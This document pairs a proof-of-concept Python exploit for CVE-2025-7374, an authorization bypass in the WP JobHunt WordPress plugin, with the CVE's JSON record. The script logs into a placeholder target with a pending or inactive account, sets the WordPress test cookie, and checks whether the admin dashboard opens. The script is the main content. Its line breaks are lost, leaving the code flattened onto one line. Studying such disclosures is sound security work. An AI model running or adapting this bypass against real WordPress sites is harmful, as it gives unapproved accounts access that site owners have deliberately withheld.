CVE-2025-7374

# CVE-2025-7374 PoC - WP JobHunt Authorization Bypass # This PoC demonstrates the authentication bypass for inactive/pending accounts import requests import json # Target configuration TARGET_URL = "https://target-wordpress-site.com" LOGIN_ENDPOINT = f"{TARGET_URL}/wp-login.php" # Attacker credentials (registered but in pending/inactive state) USERNAME = "attacker_candidate" PASSWORD = "AttackerPass123!" # Step 1: Attempt login with pending/inactive account credentials session = requests.Session() # First, get the login page to retrieve any necessary tokens/cookies login_page = session.get(LOGIN_ENDPOINT) # Step 2: Submit login credentials login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": f"{TARGET_URL}/wp-admin/", "testcookie": "1" } # Set test cookie as required by WordPress session.cookies.set("wordpress_test_cookie", "WP%20Cookie%20check") # Step 3: Attempt authentication response = session.post(LOGIN_ENDPOINT, data=login_data, allow_redirects=True) # Step 4: Check if login was successful despite pending/inactive status if "wp-admin" in response.url or "dashboard" in response.text.lower(): print("[+] SUCCESS: Authorization bypass confirmed!") print(f"[+] Logged in as: {USERNAME}") print(f"[+] Account status bypassed: pending/inactive -> active") # Step 5: Access restricted resources dashboard = session.get(f"{TARGET_URL}/wp-admin/") print(f"[+] Dashboard accessible: {dashboard.status_code == 200}") else: print("[-] Login failed - target may be patched") # Note: The vulnerability exists because WP JobHunt plugin # fails to validate account status (active/inactive/pending) # during the authentication process for Candidate and Employer roles.

{"cve": {"id": "CVE-2025-7374", "sourceIdentifier": "[email protected]", "published": "2025-10-10T12:15:37.937", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP JobHunt plugin for WordPress, used by the JobCareer theme, is vulnerable to authorization bypass in all versions up to, and including, 7.6. This is due to insufficient login restrictions on inactive and pending accounts. This makes it possible for authenticated attackers, with Candidate- and Employer-level access and above, to log in to the site even if their account is inactive or pending."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/12643dd9-3b5e-45ea-9a64-a5b00c9202c8?source=cve", "source": "[email protected]"}]}}